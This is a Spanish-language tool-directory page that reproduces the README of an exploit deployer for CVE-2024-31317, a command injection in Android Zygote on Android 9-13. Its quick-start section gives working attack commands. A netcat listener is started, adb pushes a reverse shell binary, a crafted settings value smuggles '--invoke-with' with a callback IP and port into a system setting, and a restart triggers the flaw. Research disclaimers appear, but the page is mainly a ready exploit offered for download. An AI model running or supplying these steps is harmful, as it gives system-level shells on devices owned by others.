Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/fcy10012/cve-2024-31317-deployer
Seguridad AndroidAnálisis de VulnerabilidadesExplotaciónComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsExplotación de Binarios
GitHubfcy10012/cve-2024-31317-deployer

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-31317-Deployer

CVE-2024-31317 Herramienta de investigación y despliegue de la vulnerabilidad de inyección de comandos en Android Zygote | Framework de explotación para Android 9-13

Ver Repositorio
62hace 8 mesesAún no revisado

CVE-2024-31317 Deployer

License Android Status

🔒 Declaración de investigación de seguridad

Este proyecto se proporciona únicamente con fines de investigación y educación en seguridad. El uso de esta herramienta para realizar pruebas no autorizadas es ilegal. El autor no se hace responsable de ningún uso indebido o daño.

📋 Descripción general

CVE-2024-31317 es una vulnerabilidad de seguridad grave que afecta a los dispositivos Android 9 a Android 13, y que permite a las aplicaciones con permiso WRITE_SECURE_SETTINGS obtener ejecución a nivel de sistema mediante inyección de comandos.

Este proyecto ofrece un análisis técnico detallado de esta vulnerabilidad, código de prueba de concepto y herramientas de despliegue automatizado.

✨ Características principales

  • 📱 Compatible con todas las versiones de Android 9-13
  • 🛠️ Scripts de despliegue automatizado
  • 🔄 Conexión de reverse shell
  • 📊 Documentación técnica detallada
  • 🎯 Diseño modular

🐛 Detalles de la vulnerabilidad

  • CVE ID: CVE-2024-31317
  • Tipo de vulnerabilidad: Inyección de comandos
  • Nivel de gravedad: Alto (High)
  • Puntuación CVSS: 7.8
  • Componente afectado: Proceso Zygote de Android
  • Estado de la corrección: Corregido en el parche de seguridad de Android de junio de 2024

🎯 Alcance del impacto

Versiones afectadas

  • ✅ Android 9-13

Versiones no afectadas

  • ❌ Android 14+ (corregido)
  • ❌ Dispositivos con el parche de seguridad de junio de 2024 o posterior instalado

📁 Estructura del proyecto

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Inicio rápido

1. Clonar el proyecto

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Compilar el payload

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Despliegue

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 Documentación

  • Análisis técnico en profundidad
  • Instrucciones de uso del payload
  • Guía de uso completa

⚠️ Descargo de responsabilidad

Este proyecto se proporciona únicamente con fines de investigación y educación en seguridad. Al utilizar esta herramienta, usted acepta:

  • Cumplir con todas las leyes y regulaciones aplicables
  • Utilizarla únicamente para investigación de seguridad legítima
  • Asumir toda la responsabilidad por sus acciones

📜 Licencia

Este proyecto utiliza la licencia MIT; consulte el archivo LICENSE para obtener más detalles.

👨‍💻 Autor

fcy10012 - GitHub

🙏 Agradecimientos

Proyecto de referencia: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ Si este proyecto le resulta útil, ¡por favor dele una estrella!

Descargar herramienta